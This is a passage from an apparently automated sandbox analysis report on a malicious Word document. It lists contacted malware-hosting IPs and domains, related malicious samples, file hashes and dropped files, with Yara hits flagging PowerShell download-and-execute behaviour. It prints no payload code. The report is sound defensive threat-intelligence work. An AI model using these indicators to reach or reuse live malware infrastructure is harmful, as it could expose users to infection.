                                      • Exclude process from analysis (whitelisted): WMIADAP.exe, conhost.exe
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      18:39:32API Interceptor153x Sleep call for process: cscript.exe modified
                                      18:39:36API Interceptor148x Sleep call for process: powershell.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      136.243.74.161diagram-954.docGet hashmaliciousBrowse
                                        diagram-129.docGet hashmaliciousBrowse
                                          diagram-129.docGet hashmaliciousBrowse
                                            diagram-129.docGet hashmaliciousBrowse
                                              diagram-477.docGet hashmaliciousBrowse
                                                diagram-477.docGet hashmaliciousBrowse
                                                  diagram-477.docGet hashmaliciousBrowse
                                                    143.95.80.83diagram-954.docGet hashmaliciousBrowse
                                                      diagram-129.docGet hashmaliciousBrowse
                                                        diagram-129.docGet hashmaliciousBrowse
                                                          diagram-129.docGet hashmaliciousBrowse
                                                            diagram-477.docGet hashmaliciousBrowse
                                                              diagram-477.docGet hashmaliciousBrowse
                                                                diagram-477.docGet hashmaliciousBrowse
                                                                  192.185.17.114diagram-954.docGet hashmaliciousBrowse
                                                                    diagram-129.docGet hashmaliciousBrowse
                                                                      diagram-129.docGet hashmaliciousBrowse
                                                                        diagram-129.docGet hashmaliciousBrowse
                                                                          diagram-477.docGet hashmaliciousBrowse
                                                                            diagram-477.docGet hashmaliciousBrowse
                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                210.211.111.87diagram-954.docGet hashmaliciousBrowse
                                                                                  diagram-129.docGet hashmaliciousBrowse
                                                                                    diagram-129.docGet hashmaliciousBrowse
                                                                                      diagram-129.docGet hashmaliciousBrowse
                                                                                        diagram-477.docGet hashmaliciousBrowse
                                                                                          diagram-477.docGet hashmaliciousBrowse
                                                                                            diagram-477.docGet hashmaliciousBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              yoowi.netdiagram-954.docGet hashmaliciousBrowse
                                                                                              • 210.211.111.87
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 210.211.111.87
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 210.211.111.87
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 210.211.111.87
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 210.211.111.87
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 210.211.111.87
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 210.211.111.87
                                                                                              chaturanga.groopy.comdiagram-954.docGet hashmaliciousBrowse
                                                                                              • 143.95.80.83
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 143.95.80.83
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 143.95.80.83
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 143.95.80.83
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 143.95.80.83
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 143.95.80.83
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 143.95.80.83
                                                                                              gruasingenieria.pediagram-954.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              ghapan.comdiagram-954.docGet hashmaliciousBrowse
                                                                                              • 136.243.74.161
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 136.243.74.161
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 136.243.74.161
                                                                                              diagram-129.docGet hashmaliciousBrowse
                                                                                              • 136.243.74.161
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 136.243.74.161
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 136.243.74.161
                                                                                              diagram-477.docGet hashmaliciousBrowse
                                                                                              • 136.243.74.161

                                                                                              ASN

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              ASMALLORANGE1USTT COPY_02101011.exeGet hashmaliciousBrowse
                                                                                              • 143.95.80.65
                                                                                              rfq.exeGet hashmaliciousBrowse
                                                                                              • 143.95.232.76
                                                                                              92zg0G2xll.exeGet hashmaliciousBrowse
                                                                                              • 143.95.1.174
                                                                                              TT_0034578218845301 Advice.xlsxGet hashmaliciousBrowse
                                                                                              • 143.95.1.174
                                                                                              x86_64Get hashmaliciousBrowse
                                                                                              • 149.47.223.178
                                                                                              61Wq3BOwiA.exeGet hashmaliciousBrowse
                                                                                              • 143.95.1.174
                                                                                              8H68oST12O.exeGet hashmaliciousBrowse
                                                                                              • 143.95.1.174
                                                                                              Order_Specification_10282021.pdf.exeGet hashmaliciousBrowse
                                                                                              • 143.95.232.76
                                                                                              test1.test.dllGet hashmaliciousBrowse
                                                                                              • 143.95.83.72
                                                                                              test1.test.dllGet hashmaliciousBrowse
                                                                                              • 143.95.83.72
                                                                                              Enquiry docs.exeGet hashmaliciousBrowse
                                                                                              • 143.95.1.174
                                                                                              FILE-135288.docGet hashmaliciousBrowse
                                                                                              • 143.95.76.237
                                                                                              FILE-135288.docGet hashmaliciousBrowse
                                                                                              • 143.95.76.237
                                                                                              Scan_Order_Specification_DHL.exeGet hashmaliciousBrowse
                                                                                              • 143.95.232.76
                                                                                              RPLTFL024962021.exeGet hashmaliciousBrowse
                                                                                              • 174.136.12.72
                                                                                              7mtKAPnOCbGet hashmaliciousBrowse
                                                                                              • 129.121.147.136
                                                                                              PO 2100039723.docGet hashmaliciousBrowse
                                                                                              • 143.95.246.178
                                                                                              docs.docGet hashmaliciousBrowse
                                                                                              • 143.95.246.178
                                                                                              RFQ_SMLS pipe.docGet hashmaliciousBrowse
                                                                                              • 143.95.246.178
                                                                                              Specification.docGet hashmaliciousBrowse
                                                                                              • 143.95.246.178
                                                                                              HETZNER-ASDEduLT5gkRjy.exeGet hashmaliciousBrowse
                                                                                              • 5.9.162.45
                                                                                              VYeSXonMT1.exeGet hashmaliciousBrowse
                                                                                              • 5.9.162.45
                                                                                              duLT5gkRjy.exeGet hashmaliciousBrowse
                                                                                              • 5.9.162.45
                                                                                              EaCmG75WxF.exeGet hashmaliciousBrowse
                                                                                              • 5.9.162.45
                                                                                              8p2NlqFgew.exeGet hashmaliciousBrowse
                                                                                              • 49.12.42.56
                                                                                              EaCmG75WxF.exeGet hashmaliciousBrowse
                                                                                              • 5.9.162.45
                                                                                              EzCOXP6oxy.dllGet hashmaliciousBrowse
                                                                                              • 78.47.204.80
                                                                                              IkroV40UrZ.dllGet hashmaliciousBrowse
                                                                                              • 78.47.204.80
                                                                                              C1Q17Dg4RT.dllGet hashmaliciousBrowse
                                                                                              • 78.47.204.80
                                                                                              ff0231.exeGet hashmaliciousBrowse
                                                                                              • 5.9.96.94
                                                                                              MakbLShaqA.dllGet hashmaliciousBrowse
                                                                                              • 78.47.204.80
                                                                                              MakbLShaqA.dllGet hashmaliciousBrowse
                                                                                              • 78.47.204.80
                                                                                              Zr26f1rL6r.exeGet hashmaliciousBrowse
                                                                                              • 88.99.22.5
                                                                                              OPKyR75fJn.exeGet hashmaliciousBrowse
                                                                                              • 5.9.162.45
                                                                                              meerkat.arm7Get hashmaliciousBrowse
                                                                                              • 148.251.220.118
                                                                                              oQANZnrt9dGet hashmaliciousBrowse
                                                                                              • 135.181.142.151
                                                                                              tUJXpPwU27.dllGet hashmaliciousBrowse
                                                                                              • 78.47.204.80
                                                                                              LZxr7xI4nc.exeGet hashmaliciousBrowse
                                                                                              • 5.9.162.45
                                                                                              3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exeGet hashmaliciousBrowse
                                                                                              • 5.9.162.45
                                                                                              5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exeGet hashmaliciousBrowse
                                                                                              • 5.9.162.45

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              05af1f5ca1b87cc9cc9b25185115607dQuotation No. Q07387.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              CSOIYQRONAGPERVB.xlsmGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              PO.xlsmGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              SWIFT-MT-103.docxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              new order.docxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              ReadMe[2021.11.17_21-03].xlsbGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              Offer[2021.11.17_21-03].xlsbGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              Faq[2021.11.17_21-03].xlsbGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              Invoice-947266_20211101.xlsbGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              RFQ_09AM-C206521-R1.docxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              justificantes anticipos.xlsxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              TyUOF4dZ7c.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              AWDX081511X1521.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              ETS_0100000456_063256.xlsmGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              Quote_325444.xlsmGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\ProgramData\www1.dll
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):7614
                                                                                              Entropy (8bit):5.642423826253519
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJtsPF:QJvVGaRF8I8s
                                                                                              MD5:EA2597342C982B12B68284EDBED9731C
                                                                                              SHA1:AFFB0B67308FA3D3CE363653C40915E054D398E3
                                                                                              SHA-256:654876EDD695BA8A02D4BF9EF07DA9137265B40C29A45F63DB66781C497914B1
                                                                                              SHA-512:4ADC4250D7DDB44948CF1AB24240DDEF9DA9969B87B6E48056C4FD703B3E73EE09B8219F515DCAA786F5B43588DDD8019627BB81A3E564121A66F702BFA9C78C
                                                                                              Malicious:true
                                                                                              Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                                              C:\ProgramData\www3.dll
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:HTML document, UTF-8 Unicode text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1984
                                                                                              Entropy (8bit):5.161132909110193
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:tnKMUSlcLvEGG3CRgRffWYqvBDOwfjRWBsk:RK8jN40ff0/In
                                                                                              MD5:6AA676D74FD9026D8636C06E27E0509B
                                                                                              SHA1:F6C84C972FD7C3EC6B17A21928091C5C0742901C
                                                                                              SHA-256:EEB31BA843E10D248144DF0E76F53AB79FF33891511FAB466C83CD049BB1E337
                                                                                              SHA-512:BC600F1DC5C8F841E101394A4F7C6CBE3D4F49DA18D0A1281B51B0DC0AF90D6117E4382377881DAFF2C06309D9B6FC7266A52CB3CE6F8A69D7CC4F2A1A28EB4E
                                                                                              Malicious:true
                                                                                              Preview: <!DOCTYPE html>..<html>..<head>..<meta name="generator" content="Ecshop 4.0 Custom by EcshopVietnam.com" />.. <meta charset="utf-8">.. <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, maximum-scale=1, user-scalable=0" />.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta content="NOINDEX,NOFOLLOW" name="robots" />.. <meta http-equiv="refresh" content="3;url=../"> -->.. <title>404 - Not Found!</title>.. <style type="text/css">.. body {.. color: #444444;.. background-color: #EEEEEE;.. font-family: 'Trebuchet MS', sans-serif;.. font-size: 80%;.. }.. h1 {}.. h2 {font-size: 1.2em;}.. #page{.. background-color: #FFFFFF;.. width: 60%;.. margin: 24px auto;.. padding: 12px;.. }.. #header {.. padding: 6px ;.. text-align: center;.. }.. .status3xx {background-color: #475076; color: #FFFFFF;}.. .status4xx {background-colo
                                                                                              C:\ProgramData\www4.dll
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):7636
                                                                                              Entropy (8bit):5.6438902825995445
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJte:QJvVGaRF8I8Q
                                                                                              MD5:06303A16F4C1C5F397F693020EB0765E
                                                                                              SHA1:D2D3C7274B99534C64B91EB1DBC3A49BF40A6F9E
                                                                                              SHA-256:9AC2755720E7F4BD49F21D18AD7E20149762D778DE6708C6E0819493A84B033D
                                                                                              SHA-512:257B4A076C0382D953549251F4816008B6022F90993896B5F81F535133F9FA2813391C0F292BED51CCBD9D0361392321E81DE43F9D34368C8019B393B5D679B7
                                                                                              Malicious:true
                                                                                              Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):133120
                                                                                              Entropy (8bit):6.80295704690346
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:Jbd2Mz2LOfkmkL5WQQ17fkmkL5WQQ1jRh9nQfkmkL5WQQ1:JbdH2Ukmkt9Qpkmkt9Q9Rh9nakmkt9Q
                                                                                              MD5:7702C90FF5098D859FE4837B13137777
                                                                                              SHA1:A02C1E38674E1D263EE1B696F94632950F8FF8EF
                                                                                              SHA-256:EC8650D2C13AC25176D9B119BEBF5CB2CCA3B861FDF3BA495D1FD385BF1AB928
                                                                                              SHA-512:FA0C9FC9D91174A89F02DEAFC043C9CFE2CEDC02E6699C6808BE63F6A88EC9F17AD47B80BD41E65373E157C364DFD56E9A1A67481829264BACEF0102053AD563
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, Author: Joe Security
                                                                                              Preview: ......................>.......................................................^...................................................................................................................................................................................................................................................................................................................................................................................................................................................................>...B...............................................................................................................................................................................................................................?...@...A...C...]...D...E...\...................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEA04FE6-8D47-46DE-880E-C9FDF00950BC}.tmp
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):1024
                                                                                              Entropy (8bit):0.05390218305374581
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                              Malicious:false
                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):147284
                                                                                              Entropy (8bit):4.421573738772708
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:C8JL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CWJNSc83tKBAvQVCgOtmXmLpLmB
                                                                                              MD5:8BCBE128B5CFEDC8168306182B5B3502
                                                                                              SHA1:39AF9B55FF487DDFF2349879D0D343E38C84A0D8
                                                                                              SHA-256:FA8CE7BAB40FA8F89B697A3C594FB1E72E38B02222F27870F15805ED715808DA
                                                                                              SHA-512:0893A055C42D46FB627D50EFEF8197DB1BD94DA71ADAB9329FC0E0B86EA05E037BEFC067FEA864D0F75558DF339BBF072EBC6CB5A29859B9D1A07040154258D9
                                                                                              Malicious:false
                                                                                              Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8...........N..............\W...............J..............,<...............<..............xW..............xY..xG.............T...........D...............................T...............................................................&!..d...........................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\~DF17CD00BA0C1E5190.TMP
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):59392
                                                                                              Entropy (8bit):7.254851437421879
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:4fkmkGng5kPBevBX3v410SfkmkGng5kPBevBX3v41fRh96:4fkmkL5WQQ17fkmkL5WQQ1fRh9
                                                                                              MD5:FADEECDED6606EF2CE4624D10A841716
                                                                                              SHA1:AE9C759BB2F2A266C4DBFC165665BF06DE276800
                                                                                              SHA-256:B287A49EA96FBD5D2018F1AB8C4DD9F320DF49B0E553C71D36CB305A308C8DA5
                                                                                              SHA-512:0B3A17E4412300B98CD8A99960316D2B3FB23080D451B9A09BD5C64880AA3EA599636B3E4F5C6E7EE3F71D99E3B1866A174C2A8A530CBB8B2BDEDA1E144A72F1
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, Author: Joe Security
                                                                                              Preview: ......................>...................................l.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................k....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3.......5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j.......n.......o...p...r...q.......................................
                                                                                              C:\Users\user\AppData\Local\Temp\~DF591C17C8C82AFF5A.TMP
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):194560
                                                                                              Entropy (8bit):6.094790590693576
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:PyOacwQn17zBqY2aIFUaSKQYxJckmkt9Qokmkt9QvRhOtgkmkVQG:bacp1McyRhO9j
                                                                                              MD5:151411F0596334D8B52C591FC2B37F5F
                                                                                              SHA1:985C893366FEBC507C4CD4A56B3F8E91572E53E0
                                                                                              SHA-256:CA6A8AAD87E472007800AE97C6A32491B6D3C657931BEA7381DFB083B94DF40E
                                                                                              SHA-512:8629729426CB74F0F01E5A5F3668CBE569C59E216152AFE6524317DDF54EB2A4FB74DFC7F2587654E911D3D5F042D5306DDA8915AEAF82920ECF3DDFDEF1F3E1
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, Author: Joe Security
                                                                                              Preview: ......................>.......................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................3............................................................................................................... ...5...!..."...#...$...%...&...'...(...4...*...+...,...-......./...0...1...2...................7...8...9...:...;...<...=...H...?...@...A...B...C...D...E...F...G...6...I...J...K...L...M...N...O...P...Q...R...S...T...U...V.......X...Y...Z...[...\...]...^...i...`...a...b...c...d...e...f...g...h...W...j...k...l...m...n...o...p...q...r...s...t...u...v...w.......y.......
                                                                                              C:\Users\user\AppData\Local\Temp\~DFE56B344EF3200177.TMP
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):77312
                                                                                              Entropy (8bit):7.460245093829445
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:ifkmkL5WQQ1EfkmkL5WQQ1EfkmkL5WQQ1:Ukmkt9Qokmkt9Qokmkt9Q
                                                                                              MD5:0EE6ED61BF1B98BEC33CB471FFC90224
                                                                                              SHA1:9BC4A8290C1ACB0568E93D6B11ED64A6B94B33CB
                                                                                              SHA-256:EEF36474CA9F2D98514E630E2691FA340D5F02012337D51E96881BC917A4C320
                                                                                              SHA-512:C372D50C2886A8151DF0E55E999840A90DA63214F5C57BCC98C07DE129D900F68A80527A9FC5A5DDA0D59EE53CCC89A726B9F8C5FB9526E4F7041A176AE3B374
                                                                                              Malicious:false
                                                                                              Preview: ......................>.......................................................t.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):71
                                                                                              Entropy (8bit):4.385908395318507
                                                                                              Encrypted:false
